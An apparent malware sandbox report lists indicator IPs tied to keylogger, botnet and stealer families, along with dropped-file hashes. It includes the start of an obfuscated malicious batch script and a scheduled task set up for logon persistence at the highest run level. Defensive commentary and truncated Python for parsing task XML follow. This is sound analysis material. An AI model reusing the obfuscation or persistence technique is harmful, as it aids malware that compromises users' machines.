                                        KBGC_1200O000000_98756.docx.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 154.216.20.22
                                        https://akbb.kampanyakrediiislemleri.com/Get hashmaliciousUnknownBrowse
                                        • 154.216.20.140
                                        mpsl.elfGet hashmaliciousMiraiBrowse
                                        • 156.254.70.160
                                        ppc.elfGet hashmaliciousMiraiBrowse
                                        • 156.254.70.191
                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        3b5074b1b5d032e5620f69f9f700ff0eSC.cmdGet hashmaliciousUnknownBrowse
                                        • 147.135.36.89
                                        file.exeGet hashmaliciousCredential FlusherBrowse
                                        • 147.135.36.89
                                        QUOTATIONS#08670.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                        • 147.135.36.89
                                        1.cmdGet hashmaliciousUnknownBrowse
                                        • 147.135.36.89
                                        2.cmdGet hashmaliciousUnknownBrowse
                                        • 147.135.36.89
                                        download_2.exeGet hashmaliciousQuasarBrowse
                                        • 147.135.36.89
                                        PVUfopbGfc.exeGet hashmaliciousLummaCBrowse
                                        • 147.135.36.89
                                        gp4uQBDTP8.exeGet hashmaliciousXehook StealerBrowse
                                        • 147.135.36.89
                                        dNNMgwxY4f.exeGet hashmaliciousXehook StealerBrowse
                                        • 147.135.36.89
                                        tYeFOUhVLd.exeGet hashmaliciousRedLineBrowse
                                        • 147.135.36.89
                                        No context
                                        Process:C:\Windows\System32\WerFault.exe
                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):65536
                                        Entropy (8bit):1.5090652663154955
                                        Encrypted:false
                                        SSDEEP:192:2RPGmGly9d0eLDkja1TyDdhl4Glg6zuiFqZ24lO8n8:kJGlykeLDkjOTwj4kg6zuiFqY4lO8n8
                                        MD5:6191AD8638ABA3710C3DE1261E3E46BD
                                        SHA1:DEE1AEF616E93127DB2E2F434E2FFE59945DD177
                                        SHA-256:FC5AE0D171D7938C8F2B58223B81DA277361A91759EF3FCE3AC836A84366ED53
                                        SHA-512:5752F4A5E7D6F96BA60FE46628D092659D27C9A4F08FED8247C363995424EE665F6B0BB4AFE04956AFC25B4EA081FB809A294CB1CE7804DFD1B4182ED63E8257
                                        Malicious:false
Preview (UTF-16 decoded):
Version=1
EventType=CLR20r3
EventTime=133724336744773663
ReportType=2
Consent=1
UploadTime=133724336753992464
ReportStatus=524384
ReportIdentifier=4cf4c2d6-d7db-41d7-b536-9cba589ca4c0
IntegratorReportIdentifier=1384d969-3641-464b-adbd-caad9537146c
Wow64Host=34404
NsAppName=powershell.exe
OriginalFilename=PowerShell.EXE
AppSessionGuid=00001bb0-0001-0015-f924-16629315db01
TargetAppId=W:0000f519feec486de87ed73cb92d3cac802400000000!0000f43d9bb316e30ae1a3494ac5b0624f6bea1bf054!powershel
                                        Process:C:\Windows\System32\WerFault.exe
                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):65536
                                        Entropy (8bit):1.509199399227813
                                        Encrypted:false
                                        SSDEEP:192:6kmEmG6My9d0eLDkja1S1ufoJl5lg6zuiFFZ24lO8n:NmDGRykeLDkjOO+orLg6zuiFFY4lO8n
                                        MD5:537E6D1007A60C28FEC695BEC3D4976F
                                        SHA1:B344E62934395A039C2A9346C5ADD72CCEBDF081
                                        SHA-256:DEAB50A5D2700BA002BE5026539740A3E108A659F792F7C19A16D0C8C7510005
                                        SHA-512:77F4095F21BFA9880764FE4EC57A7FA7AF6D50A80F3F5BA9DAF4A640AAB32D2133C6F8B3B2034F64FAD473FA9F3981C6549678636A4CBABFE2161B73AC89D979
                                        Malicious:false
Preview (UTF-16 decoded):
Version=1
EventType=CLR20r3
EventTime=133724336340294318
ReportType=2
Consent=1
UploadTime=133724336348888047
ReportStatus=524384
ReportIdentifier=d149bb2c-3b32-4e65-aa92-fe12568dbb41
IntegratorReportIdentifier=62f68f18-99a8-45a3-a5bd-d2023b800671
Wow64Host=34404
NsAppName=powershell.exe
OriginalFilename=PowerShell.EXE
AppSessionGuid=0000192c-0001-0015-689e-3b489315db01
TargetAppId=W:0000f519feec486de87ed73cb92d3cac802400000000!0000f43d9bb316e30ae1a3494ac5b0624f6bea1bf054!powershel
                                        Process:C:\Windows\System32\WerFault.exe
                                        File Type:Mini DuMP crash report, 15 streams, Thu Oct 3 12:53:54 2024, 0x1205a4 type
                                        Category:dropped
                                        Size (bytes):916769
                                        Entropy (8bit):3.4582296911583743
                                        Encrypted:false
                                        SSDEEP:24576:t8QCnkLu4EnZgfWLPHwyTjbqseyQSzgl:t8QCnkC4EnZgfWzHwIi9sgl
                                        MD5:EED7AEE7939B8A624D764CE0FDFA7896
                                        SHA1:6FCCEAB8C32BC53962AD34DC244F9A5C77E58198
                                        SHA-256:A30FBFA8BA50A3D88CA477AD33B6E62BCBA28B820FAF02E7929728A51B4BDB60
                                        SHA-512:C0425AE5A8AE7BBB55C6C1002A62331BA75E2EBC85D2B0DBCFEDA40F4C4F57E6BC94BE8A22067863D0F02E6AB32779877E879CC3C40E48E0085A353CF9FF913F
                                        Malicious:false
Preview: MDMP minidump header; recoverable embedded strings: Eastern Standard Time, Eastern Summer Time, 19041.1.amd64fre.vb_release.191206-1406
                                        Process:C:\Windows\System32\WerFault.exe
                                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):8780
                                        Entropy (8bit):3.70017372523216
                                        Encrypted:false
                                        SSDEEP:192:R6l7wVeJyv46YzJwgmfZaPTpWEd89bYODfpIm:R6lXJS46YdwgmfQPgYyfT
                                        MD5:A2F67D33F80638A48FDF2B36CC0DED98
                                        SHA1:7C0697CC35565A382943EDA94835DB071102AE15
                                        SHA-256:D6718ED7E29F921C3631FB301C34AC0721A680A61EB07D9A455BE0BE605EEAB3
                                        SHA-512:C278B6EE38CA436091948CFA16312AF26DF6D3972F5DD5B886C01542CA89ECF558C01FFD32EFCC2CB3D3892B933760E9927208EFB78A207A2142D847F110BEE8
                                        Malicious:false
Preview (UTF-16 decoded):
<?xml version="1.0" encoding="UTF-16"?>
<WERReportMetadata>
  <OSVersionInformation>
    <WindowsNTVersion>10.0</WindowsNTVersion>
    <Build>19045</Build>
    <Product>(0x30): Windows 10 Pro</Product>
    <Edition>Professional</Edition>
    <BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString>
    <Revision>2006</Revision>
    <Flavor>Multiprocessor Free</Flavor>
    <Architecture>X64</Architecture>
    <LCID>2057</LCID>
  </OSVersionInformation>
  <ProcessInformation>
    <Pid>6444</Pi
                                        Process:C:\Windows\System32\WerFault.exe
                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):4777
                                        Entropy (8bit):4.441804039637695
                                        Encrypted:false
                                        SSDEEP:48:cvIwWl8zseXgJg771I9PMWpW8VYMYm8M4JQ9wSFmvmyq8vlwgytfeMd:uIjfbI7Al7VYJQGoWugufHd
                                        MD5:883C6BBF4298353A073AD4AC0110C98F
                                        SHA1:C2842AAFCF521F1043B23C2233A27FA905047AE5
                                        SHA-256:582837EE81F402E266AEF0AEB5619DCECBBCC2637AE4368875C1A005C25A3643
                                        SHA-512:2B1056308795C4D66DA019A7E4E1F60916A5DD10A9590FF1DBE95E67C0C41C6D03F623D6DC1850B24030658CAA2111A9FD2BEEB68FE57EFEAD3FE8FA6F027630
                                        Malicious:false
                                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="527276" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                        Process:C:\Windows\System32\WerFault.exe
                                        File Type:Mini DuMP crash report, 15 streams, Thu Oct 3 12:54:34 2024, 0x1205a4 type
                                        Category:dropped
                                        Size (bytes):904688
                                        Entropy (8bit):3.4881990991517235
                                        Encrypted:false
                                        SSDEEP:24576:7qPVO/6TR9/7Ty+T0GV+C5sfsqjUOqQ0pok:GPVOCTR9/7Ty+T0c+EC/4Ouok
                                        MD5:596AE69B8C49A46838958D012DB559FE
                                        SHA1:ADD49CBFD7D1929976027699BE58876BDB43D797
                                        SHA-256:9F983ADDA08F7531C659BECFEAC0F752B8E57E243501F9418F61DC28379BD581
                                        SHA-512:355325755C40ECD3D59ADCF3705867B7F1919F9CDDF8B0A0D47D28234DC26E001701A307BA713DA75C41D633C1B3AC7EC9015967459CEED4D158B62186FC9E8C
                                        Malicious:false
Preview: MDMP minidump header; recoverable embedded strings: Eastern Standard Time, Eastern Summer Time, 19041.1.amd64fre.vb_release.191206-1406
                                        Process:C:\Windows\System32\WerFault.exe
                                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):8780
                                        Entropy (8bit):3.7011872798164305
                                        Encrypted:false
                                        SSDEEP:192:R6l7wVeJHgy6YIZ8gmfZaPTpWEg89bgH1fSgm:R6lXJAy6Y28gmfQPngVfk
                                        MD5:6D9E3486A8233E1E83E6A7C9D258B3F1
                                        SHA1:991B46BB82299D3AA243FFE8D9E5E246403FD51F
                                        SHA-256:DCF4E5E5C46159D8AE17A097AF458DCE9A062A7CB40A6693E756A397A9A358E7
                                        SHA-512:DF5B1F45F71C34072ABE0C17CE3B367224E20DDADEDFD1ECB9AD1BE08635B5713F989B4EC4FD657D03831094D1BB2FEAAEF1AF4BEDB7F19ECDA27E8938C24C56
                                        Malicious:false
Preview (UTF-16 decoded):
<?xml version="1.0" encoding="UTF-16"?>
<WERReportMetadata>
  <OSVersionInformation>
    <WindowsNTVersion>10.0</WindowsNTVersion>
    <Build>19045</Build>
    <Product>(0x30): Windows 10 Pro</Product>
    <Edition>Professional</Edition>
    <BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString>
    <Revision>2006</Revision>
    <Flavor>Multiprocessor Free</Flavor>
    <Architecture>X64</Architecture>
    <LCID>2057</LCID>
  </OSVersionInformation>
  <ProcessInformation>
    <Pid>7088</Pi
                                        Process:C:\Windows\System32\WerFault.exe
                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):4777
                                        Entropy (8bit):4.439949775834441
                                        Encrypted:false
                                        SSDEEP:48:cvIwWl8zseXPJg771I9PMWpW8VYIPYm8M4JQ9wSFAmyq8vlwl5ytfjd:uIjfgI7Al7VdSJQGBmWujufjd
                                        MD5:309127845078F3E197EDF7FEDA3D9293
                                        SHA1:BF12E5A090E1F8EC732B1BD3B2A625996EB67D37
                                        SHA-256:054DE9739F4B0A9A517AFB0897E924BE765D0EB178B71AF0F5F2A03B185CC6AD
                                        SHA-512:F7E1978F17EB5770F7D4C6B555698324D424FC11ED8A490A7A9374C69D399516E76F5ED8C97AF653C9BCAA8F885D7693339E47D3672526DD49D4A05D3BE07558
                                        Malicious:false
                                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="527277" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):9713
                                        Entropy (8bit):4.940954773740904
                                        Encrypted:false
                                        SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emdrgkjDt4iWN3yBGHVQ9smzdcU6Cj9dcU6CG9smu9:9rib4ZIkjh4iUxsNYW6Ypib47
                                        MD5:BA7C69EBE30EC7DA697D2772E36A746D
                                        SHA1:DA93AC7ADC6DE8CFFED4178E1F98F0D0590EA359
                                        SHA-256:CFCE399DF5BE3266219AA12FB6890C6EEFDA46D6279A0DD90E82A970149C5639
                                        SHA-512:E0AFE4DF389A060EFDACF5E78BA6419CECDFC674AA5F201C458D517C20CB50B70CD8A4EB23B18C0645BDC7E9F326CCC668E8BADE803DED41FCDA2AE1650B31E8
                                        Malicious:false
Preview: PSMODULECACHE; recoverable entries:
C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1: Uninstall-Module, inmo, fimo, Install-Module, New-ScriptFileInfo, Publish-Module, Install-Script, Update-Script, Find-Command, Update-ModuleManifest, Find-DscResource, Save-Module, Save-Script, upmo, Uninstall-Script, Get-InstalledScript, Update-Module, Register-PSRepository, Find-Script, Unregister-PSRepository, pumo, Test-ScriptFileInfo, Update-ScriptFileInfo, Set-PSRepository, Get-PSRepository, Get-InstalledModule, Find-Module, Find-RoleCapability, Publish-Script
C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1: Describe, Get-TestDriveItem, New-Fixture, In, Invoke-Mock, InModuleScope, Mock, SafeGetCommand, Af
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):2916
                                        Entropy (8bit):5.3871960512613635
                                        Encrypted:false
                                        SSDEEP:48:4HAzsSU4y4RQmFoUeCamfm9qr9t5/78NfpHcRDGxJaGaxIZVEouNHJBVrH/jCB:8AzlHyIFKL2O9qrh7KfpRJlPEo2dL8
                                        MD5:631C3C75A8C0F4DBD37FB862C5396E4B
                                        SHA1:DE2A4AB1FA3127D61C2BA0DEB121824A40FBA37C
                                        SHA-256:3CE6D383C9857E94AEF34DB81F846806DB9A8AF34B462DABA9A0464CCE6E30EA
                                        SHA-512:4BD4A403BA45DE3E1AD0A2DEF4C5643E547DFC2013591529B2102C5DE091D33F8335BCF95CE16264E0BB3C510BD3B32584FB152569B6432DB910220D15AE1E76
                                        Malicious:false
Preview: binary data; recoverable embedded assembly names: Microsoft.Powershell.PSReadline, Microsoft.PowerShell.ConsoleHost, System, System.Core, System.Management.Automation, Microsoft.Management.Infrastructure, System.Management, System.DirectoryServices, System.Xml, System.Numerics, System.Data, System.Configuration, Microsoft.PowerShell.Security, System.Transactions, Microsoft.CSharp
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:data
                                        Category:modified
                                        Size (bytes):416
                                        Entropy (8bit):7.500203693210278
                                        Encrypted:false
                                        SSDEEP:12:MoCe21fsfY9Zk84pnSS16mxXhMfXWQqhjoqw01s//e3H:MoCXsgk84Ahq6WQqHw0t
                                        MD5:F4202432DA421942ECEAA113C3365647
                                        SHA1:583FB67FF1B5308DE144BBB598675162DC0C4A1F
                                        SHA-256:202C586C6424B65FD143967C64DA5CDC9B0539C6F44E4B35998652A050ED4069
                                        SHA-512:691D3AB43EB03B3D25E07F87FEE7DA5F9DEEF1DBB061C9F7E29AA3FFBC0710BB55B3F8DAE22E602EFD678B2560E2E4D41406200F9417FFFADFB4B1F670373440
                                        Malicious:false
                                        Preview:U.!.3.(..g..jU..T...t^K.....{.W.Wy.`..g.4;...T..............&_R...h{.Y.<..W..NUz.r.l.W.w.RF....7..UH.D..0>v8...).y...].....D.6J{..'`1?M)N..A...*O..^.f..v..up.p..j.#YvKB....m.u+E..p.......,.M;.....xq..\.xp.o....WBg...'..7.IpcL..M......5u..f.~bE.M..u@g..{....w.!8.....qZ`J<6..>..@..n.....PT.l.......}..Zp03[....J..fM.5.2O...F.".w.......>C..E..|.I.[....(.Q.T...5.|.....02...O...g...7..[...`Q.U..'.
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with very long lines (5674), with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):5214429
                                        Entropy (8bit):6.008704485108026
                                        Encrypted:false
                                        SSDEEP:49152:BYFeyNRX+o9UIcbBIXu/DloMIZv/us2aFGKeXGuqzwIEqHL5l8M/CJs2:r
                                        MD5:D1324A085A54C035D136F7A73EDEC440
                                        SHA1:3049E422F937395D1D64E205CE5978182D3C2388
                                        SHA-256:6A25D0CA74A29596A0C09F26ACBE9F85A46D5C1C886A6860DC915D94FFBBBE5A
                                        SHA-512:0D43B7711A86A6C04DDA27555037DC5E459A5AAD4FE719E0D03B2D37CF3B8274E9A0417D089135E9ABC3D6232F2BF7264781B5A8B7988058C13BC0C794027CBC
                                        Malicious:true
                                        Preview:Aecho off..%^%A%KhlQYXcflBNlDRnjWyCtzUMbVdihsfHGoAGNTEJeLZNLqMbLlXPalwqPvjUVOUMfTgWclzprOxHzgaKicxWvpHuSkQsKJOpQnISjQYALHylNOQJuzMSrYqQlLdSuhFIahRmyiAsdWkORvHethXkXVYRWSGyNffDcPlGXEkmYtPvNCYPeZznkuLejZqGBcFYQHLck%%^%e%hPWLmDgCetTQtOGStIdgwXoEKVOREgRWEdRJqyhiYGVWNKJRrYodYeEjAsbrOpYYCWmpWWBUAVhPcsRZmXzGSNYAyIjYxQuJIWtQytUuwtCdXPgiBbfQPsgPYLQoND%%^%c%KAygfZaASdfjylUCJBawwLDTqQERMDGGSXRCzJbjAAmNKiHDdjhNMhaZXEPovjOowyrBurdazRWVyQjijaODwTTLWSFVTMOrMXrlRgiLfhnVkfAguHfuukSCEFECMihNdFjAzXrcScyoGYARryAlGtWBeOHlCGZWZzSF%%^%h%aHwqdBsMDWGeNlnHVgJJHvLqgAmcBpgfVUrReUDSDPARbgOvMpdsjVoEWgkCpqloPAjSTwDbCRfSUToZMRqmlOWZFNUYKaCnDmcBXVBqMcPrQwJdRkQyaZdbDjmgBEqBoSoIRNcQpZAiYEjjeRhzkdnEiaYNIuPhLndYialehajazVdYZdcKxRrlEJAQPohUkswKBlbdFcrjUmfm%%^%o%ZOFseJUWRtyzvoSSoPgytwOcYeuzhqsDnTPACCfIBNJRCEkNyqGwZODCZDtaouOBaVlBzsqLKxWFMWAuUGaQKVEzpmAYjfuhZiRHsIogaUMBRYQddYfIuXRfqMmmRrCEdPFEfSclsUQPjcIrwxVkZLNcrLqFwcoIshybslYkWUpzgcVodVQuvsFrcDntCwPqFixbDHYkzLnfvnWpPb%%^% %BmUmZChYPYEHAeZTXEULwWFVKezVPHYDAUndLWxzwIilUdNawt
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):26
                                        Entropy (8bit):3.95006375643621
                                        Encrypted:false
                                        SSDEEP:3:ggPYV:rPYV
                                        MD5:187F488E27DB4AF347237FE461A079AD
                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                        Malicious:true
                                        Preview:[ZoneTransfer]....ZoneId=0
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):3488
                                        Entropy (8bit):3.5852570413238927
                                        Encrypted:false
                                        SSDEEP:48:yei1q97CQn1ab9o9V9Lvara+i3iusupRCRvA9ufAuRa7G5XhPsbN1jANg8iJXCc0:txnkp2Gdi3ipVA9ll7EhAMz3cHtr+
                                        MD5:FF7FADBC1F6F70260480D0DEB8DE497A
                                        SHA1:61BD94D4B9E4C4AE140FC34AA3E070E8FD1DE20F
                                        SHA-256:DB8859332F0AAE996F50E8B888F898C08C1B68DAEBB086C99C4540306D2BA811
                                        SHA-512:DB7FB886AACE4F7F1460B1E933C48276BDB29DF1BCFC90884A55F516A5929213131F4B1F6F105E4740C02745349B615EB5EEFE08D107F3F7765094DC0567FD80
                                        Malicious:false
                                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.T.a.s.k. .v.e.r.s.i.o.n.=.".1...2.". .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n.d.o.w.s./.2.0.0.4./.0.2./.m.i.t./.t.a.s.k.".>..... . .<.R.e.g.i.s.t.r.a.t.i.o.n.I.n.f.o.>..... . . . .<.D.a.t.e.>.2.0.2.4.-.1.0.-.0.3.T.0.9.:.1.4.:.0.9...7.3.6.-.0.4.:.0.0.<./.D.a.t.e.>..... . . . .<.U.R.I.>.\.$.r.b.x.-.F.H.O.I.a.p.s.b.<./.U.R.I.>..... . .<./.R.e.g.i.s.t.r.a.t.i.o.n.I.n.f.o.>..... . .<.T.r.i.g.g.e.r.s.>..... . . . .<.L.o.g.o.n.T.r.i.g.g.e.r.>..... . . . . . .<.E.n.a.b.l.e.d.>.t.r.u.e.<./.E.n.a.b.l.e.d.>..... . . . .<./.L.o.g.o.n.T.r.i.g.g.e.r.>..... . .<./.T.r.i.g.g.e.r.s.>..... . .<.P.r.i.n.c.i.p.a.l.s.>..... . . . .<.P.r.i.n.c.i.p.a.l. .i.d.=.".A.u.t.h.o.r.".>..... . . . . . .<.R.u.n.L.e.v.e.l.>.H.i.g.h.e.s.t.A.v.a.i.l.a.b.l.e.<./.R.u.n.L.e.v.e.l.>..... . . . . . .<.G.r.o.u.p.I.d.>.b.u.i.l.t.i.n.\.U.s.e.r.s.<./.G.r.o.u.p.I.d.>..... . . . .<./.P.r.i.n.c.i.p.a.l.>..... .
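The file above, written by svchost.exe, is a Task Scheduler definition: Windows stores these under C:\Windows\System32\Tasks\<URI> as UTF-16LE XML with a byte-order mark, which is why the preview shows two leading dots and a dot between every character. The fields visible in the preview are the ones that matter for persistence: a LogonTrigger, RunLevel HighestAvailable, the principal group builtin\Users, and a task URI (\$rbx-FHOIapsb) registered at the root rather than under \Microsoft\. The following is an added example, not code from the Joe Sandbox report or from the sample: it decodes such a task file and reports those properties. The XML it parses is constructed from the preview's fields; its Actions element is a placeholder, because the preview is cut off before the sample's actual action.

```python
"""Decode a Windows Task Scheduler XML definition and summarize the
persistence-relevant fields. Added example, not part of the report; the sample
task XML is constructed from the report's preview (Actions is a placeholder)."""
import xml.etree.ElementTree as ET

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Constructed sample. RegistrationInfo, Triggers and Principals mirror the
# preview; the <Actions> command is a placeholder, not the sample's real action.
SAMPLE_TASK_XML = r"""<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo>
    <Date>2024-10-03T09:14:09.736-04:00</Date>
    <URI>\$rbx-FHOIapsb</URI>
  </RegistrationInfo>
  <Triggers>
    <LogonTrigger>
      <Enabled>true</Enabled>
    </LogonTrigger>
  </Triggers>
  <Principals>
    <Principal id="Author">
      <RunLevel>HighestAvailable</RunLevel>
      <GroupId>builtin\Users</GroupId>
    </Principal>
  </Principals>
  <Actions Context="Author">
    <Exec>
      <Command>C:\Users\Public\placeholder.exe</Command>
    </Exec>
  </Actions>
</Task>
"""
# On disk the file is BOM + UTF-16LE, exactly as the dotted preview suggests.
SAMPLE_TASK_BYTES = b"\xff\xfe" + SAMPLE_TASK_XML.encode("utf-16-le")


def decode_task_xml(raw: bytes) -> str:
    """Strip the BOM and decode; Windows writes UTF-16LE, hand-made files may be UTF-8."""
    if raw.startswith(b"\xff\xfe"):
        return raw[2:].decode("utf-16-le")
    if raw.startswith(b"\xfe\xff"):
        return raw[2:].decode("utf-16-be")
    return raw.decode("utf-8")


def summarize_task(xml_text: str) -> dict:
    """Pull out URI, registration date, trigger types, principal and commands."""
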